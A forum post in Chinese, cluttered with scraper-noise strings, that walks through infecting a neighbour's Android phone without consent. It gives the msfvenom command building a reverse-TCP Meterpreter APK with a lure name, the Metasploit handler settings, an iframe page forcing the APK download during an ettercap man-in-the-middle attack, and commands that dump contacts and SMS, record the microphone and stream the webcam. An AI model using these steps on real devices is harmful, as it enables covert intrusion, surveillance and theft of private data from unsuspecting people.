找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1823|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1 Z' X4 m& h( ?0 G; \* P9 N8 ~ 五、msf+ettercap入侵邻居安卓手机 - z6 S* K5 ]% u6 k

; y I# `2 \3 c9 H9 x

O2 s% E. m4 t4 ^+ j1 s 首先启动msf . g% {' y" D: }. l! y5 F" Q3 k

" A2 v4 C. j8 h" Z& v

6 A0 N1 d5 r) w8 N$ m/ G 先用kali生成一个安卓木马,如下命令: 8 d1 c2 m% l6 X1 L9 m6 m, T2 R

1 y+ ^3 D% P( }, ~3 ]

" j* t% X5 y F |, {9 f7 J# Y7 i Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk ) P, a, T) \+ W. \; e6 g

8 O& ?2 k; q' s) }# y: o

- v* X5 e( `+ v5 \6 _ 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 5 H) K' I4 S i/ }1 t& `

i; ^7 ]+ d$ V

& D' b, F6 m, H 然后进入msf 9 I3 y: v/ s& i" r* K

0 |% s) _2 X; D: C1 p. G$ o

9 W4 u$ O/ m; d4 x use exploit/multi/handler 8 H) M. T. _9 k

* l+ [9 {0 n* h& Y( ^. Y- b

9 {' F* E" Q/ Z3 q. r( P4 v set payload android/meterpreter/reverse_tcp - }$ O+ [/ r% x5 E0 K( i2 \5 Z

% s" [1 c# ?3 Z& l2 y8 Z

7 V6 @: J5 \# _4 ` set LHOST 192.168.0.109 //ipkailiip 1 P7 d( k4 U# ]5 n2 S

) @% U r8 j' m* N4 h% |

1 U/ b+ u. p: m; O% n" E9 I2 m5 y" H set LPORT 44444 //端口一定要与前面生成的木马的端口一致 2 m# _. n9 f1 w* X" I1 @

( P5 ] y2 j4 a. f6 [

' w' R' ^" f4 b& o { Exploit % d/ [- C s0 f) C' t, O7 d" @+ ~

5 t) s) e( Z6 X% B1 `

, Y2 e; a4 _/ j: K   . M; B: q' p* J) `( Z: W* y

- i4 X& y, N i6 c8 R, ]$ D

. ?7 [& i9 H/ n' G( J 下面我们开启ettercap -G 4 j$ a o1 [* I9 ~ O/ i

, i0 n2 W! O+ G! S

Y6 |0 J7 g4 Y* p" l, z 我物理IP ' b" }3 S9 A4 q. ? P

' A3 c! C" K0 i/ k4 G

4 n( B" c" N- ]# L5 f   , E" X3 a( u, K7 ?6 K1 Y5 I# k8 Y

/ Z. d6 a. C( J0 [% \0 g$ }4 g3 G% t

& C/ y) ?3 `4 q7 s0 I 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, " Z8 r5 C* f+ ?( E% v9 F

, p8 ~ }% n/ R' L' Z( A! q

% K9 D, }$ Y7 G 下面我们来设置一下 / S: g2 J8 `; q! o$ l* B

6 \4 p9 K( W7 Z7 d* Z0 o1 v1 Y, P$ j

4 Q& J+ G. T) x& m: O4 s* B   + q9 I& f {3 [8 M

$ m' e* D. F& ?) z/ N3 A, t

4 e1 Y* C' G4 g _- x4 O- E 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, # B* l$ l( e6 w

' N) T- W5 x% S3 V2 C

; O+ V. i/ R& ~& z R: A   8 h% o8 l' [. G& }

; m" W I( e8 K. [5 x1 V j

( L5 {2 P; v. L. g5 J: v7 A* L& h/ G   M; Z6 U+ {* A4 X

5 p! f- Q, [/ h

+ K2 j" l' h' q+ @& P7 E+ }5 r   ) e: Z7 s6 T3 r4 [4 ` D8 z0 k( k

& g/ n- a2 S# i2 }1 ^0 V! d" n

. \4 I+ Z: D- O6 v' ~* c& O$ R- w" {   3 U* o8 W5 D4 }5 @- K$ N0 @ O9 w

+ |" P9 W4 i" S- d5 z

- N1 e( p$ J9 R! g   + i# ], b5 M* e3 e$ I

& p( L) e0 G5 \- d% `* I$ H( ^. S

3 K) L( p9 ?8 i# }5 A   % u8 B6 C3 M0 X5 d4 |

' U }) M6 C' O' p; _! R* b

. ?! r: i/ ]. j1 n   & F) \) Q3 d0 a' Z

( p" k, r/ h5 V

! Q! F3 O( G3 }+ v- m' F- j# i   + ?4 J6 k5 ~5 ^* n; u9 U

5 I6 H' V( G8 D& g

4 W) e5 G6 ]: N, X. h   9 u9 u: _) u }" Q1 h

4 g4 T. S& J6 r/ ^- W3 ]3 b

1 n0 Q: Z) x8 L: G" ~) p! t9 F   l: [" h8 b& ^ b

3 m7 M* h. H4 Q

; ?6 H7 h; k1 {* T   " L; \+ |. j& C' {( G

+ S5 M2 q% j( @. Y

j" I }# K* J, C   9 ~) S% {/ P; ?- }/ i0 d. E

2 W! n: L8 y+ p7 Z) r0 D/ t, ` k

. k4 P- D( W- r   J/ e8 m* _% g X

' H7 _0 T0 e V+ B! K: W

1 P* Y9 U' ]. |( }+ \ K) ` 下面我们开始攻击 $ X; L" x: ? {3 i% C' `* M) C$ C- y

8 S2 r! h1 L2 L

9 e! ~( P' i1 M2 O   8 M% j' h* R# `: @# G, u: e0 X

, i: k5 Z! a9 l# C$ x0 j

+ G. c+ t' b0 W Q+ j   3 O6 ^0 ~. H- j- H2 i e: K9 G z5 R

2 x9 V' o6 U' ^+ u

9 z7 w8 X- f& U) X4 a6 R0 `   2 k: R4 \: |4 E3 u* {0 O

) t% Q( ]/ Q! _( h% W

4 A. K- U9 g+ F   6 D* Q5 F/ @ L( Y

6 N: \! B- v N7 J0 F, M% k

+ R! q+ n& m% x/ F7 g$ S% N   ) J! i: f. p( N. W$ q( @7 g

* k2 u; j0 t- q |, j* W* n3 Y

: h% \& {) A g/ m/ L: ?% c 大概过了5分钟多,发现反弹成功了 * k( F& Z0 B# f$ q) c+ A/ q

, t! A# L$ F) K- J$ i

8 y+ l z4 w( A, S+ D0 M   ; t- y( m3 T) ~ t2 [6 o: ]( R

8 l3 y( S1 l9 A* [# z5 k' x

( I9 Y3 U5 M5 v: J   5 {, W& s2 _, w6 A8 Z5 i( f6 E n

) U3 E* \5 N( I- \) k% @4 m

1 p0 L: t4 E$ U' t' J" O   / z* u& E. W, Z) s2 \. p9 L

; D D3 k7 V* S% t

: Y/ w" S; b, n1 k1 x   % i* ?' ?( Y. _3 P# m2 z7 p

$ Q" s4 w2 A4 W: V

7 I9 y u' O* m. J   8 [$ l) [8 u, @( M1 W2 h3 V+ t: F5 W

$ b" }# M% F7 U% e! W2 s$ B

! c9 E: ^1 |) u1 x+ V2 L   0 W. I! k; L4 B5 C

" Q: }% n" V: u) C

0 l' I$ a2 }. @4 @) r# j' p   8 Q- _7 D: l- i7 u2 y/ I4 B6 x

7 {; K( N1 `8 ^! T+ b

9 i. M# S( A1 c; F% y7 t; H& k 执行命令 5 e+ V2 {4 Y1 b/ S* L

& j7 [) J- ?" Y

7 O- d+ S5 r+ Z. f( z   - q0 `5 p% S5 a0 z& U5 N8 h. a7 p

; u8 {) K a1 {

4 ?$ L) b( t, s6 a dump_contacts    --》这个是导出电话 7 S" H4 O% f# ]! }

) |6 I4 j1 ]$ O( o, m9 g ?

4 D! M1 H! h9 T# |# j+ c8 ~* O dump_sms --》这个是导出信息 * J# d" n" a* R" V6 l

- J# M B& s& U

/ d* `) @; C, |4 ~ record_mic     Record audio from the default microphone for X seconds 0 ?+ w, O. ^. Y) W

8 a% v# m( }5 ~/ B( `

! `- A. I- }; Q; `1 P, A     webcam_chat    Start a video chat - r4 i% G( L/ ^' w+ \

/ ~* _0 a& t# Q8 Q* ^& B6 s

5 l6 i, A( @$ w2 R9 r- H     webcam_list    List webcams / Z& c$ D# i. Q6 V9 Q

" |& I, I5 K" H! A! U4 o

0 Z- {, }" A; b+ p     webcam_snap    Take a snapshot from the specified webcam 4 T) J5 ^% _: J* G( ~! J

4 x) y8 H: }( q2 M$ {5 b3 [% ?+ c

" T; K; Q4 |( W. `' U$ ]0 y! d5 \ webcam_stream  lay a video stream from the specified webcam ) ?1 c$ M: {! ~+ c- q

6 c- C+ M2 X' W: E. a" G4 N, V$ J

$ F9 k; j: A/ X7 `2 G   ) G; @3 g8 t, V7 k9 p/ D

. m3 e. l$ K: Z7 R; V" _5 f

T* e9 a- ~( e+ j! Q   1 j* b2 `% n& [# u; y8 w) {

6 K5 }6 a2 K+ R4 S) O" ~, c

2 }: y8 i+ }' C/ r1 i2 o 我们打开看一下电话薄, ) ?: j! Y3 g: W/ {

: @& {3 a4 }" v' s+ H8 i$ M$ r

& Z; e8 U( U8 F5 i2 R- ^   6 o ^7 E4 }8 u0 R; A' Z

3 l' a7 L5 J9 e9 \. b! x8 _2 w' z) \

9 @! X% ]4 \& Q$ {- F9 N A0 r   : e! j3 g* W( r5 C+ D

/ a( u1 V8 r8 q5 Q

* J! E8 n. m- N: e& v4 G; P9 Z   4 Q2 g0 q3 a' `* `# k3 n

2 v: t% ^ {# [6 L5 n8 M6 E. p

R7 k) Z+ U; ^4 h- l; L0 w8 w   3 s/ i j$ W; L$ P% ` M4 `2 Z o

" y% N2 V3 p% K) W6 K# J6 U

' }3 z7 m/ |/ X% b* ^0 u   9 D2 ~- V' M$ g& |7 s( k

$ L$ o' a/ Z8 ]# i& b# u

9 P* r5 k' r9 k5 b0 i   ) ?, Q, B0 x2 Z/ y

' {4 w8 J; d* {) s7 Y. S

- j% m2 Q9 h8 E4 }( m 我们同时欺骗成DroidJack木马,使用方法如图: 2 X- w. k. H5 Q6 Y

# |+ ^3 |4 G- f: r# r! v- v

! P8 e0 R6 g8 H6 N4 p   9 y" n& \. z9 {8 m

+ Z( C% w* W7 g9 a) d

1 C+ p; \1 `% z6 u3 }, f5 p$ ] I1 i' y   ; I3 x8 K- D" t+ l

# Q7 b ]0 \- `$ f2 e

' U( w. G& i6 l. i) K0 d   8 D# }+ u2 y9 Y- I- R

2 b) l, ]2 z, x q6 @6 P

% M" R& S$ W8 d% F) t; l( T 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 % N. h; Z/ d# q G0 q( \

8 d2 P/ h7 B( [' H% v

" V- V3 u/ R1 N: u   1 C9 _. ]/ ~# m+ w [7 h1 ]: k* O

1 ^7 J v- A# c5 y/ j1 w! H" c& X7 t

3 ?0 \( D" G% e# I: w   ' Y3 F) D% m5 k( J" y

4 Q! o9 p8 I* V/ m

" @6 v3 e0 B$ \- S$ W& o   + V' y3 G j7 E! i6 J7 B8 @

! }" [6 w6 ?+ l6 r+ Z* V0 q% h

/ e& h3 t/ T, S' C/ K8 y% s ~ & l! _ P2 o6 ^+ D- f8 t

f% `, d) K, B: q9 g% b: u. n

{. @0 o+ f5 w# k/ N; g! r) \
8 O. @- H% e9 ]% C% I

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表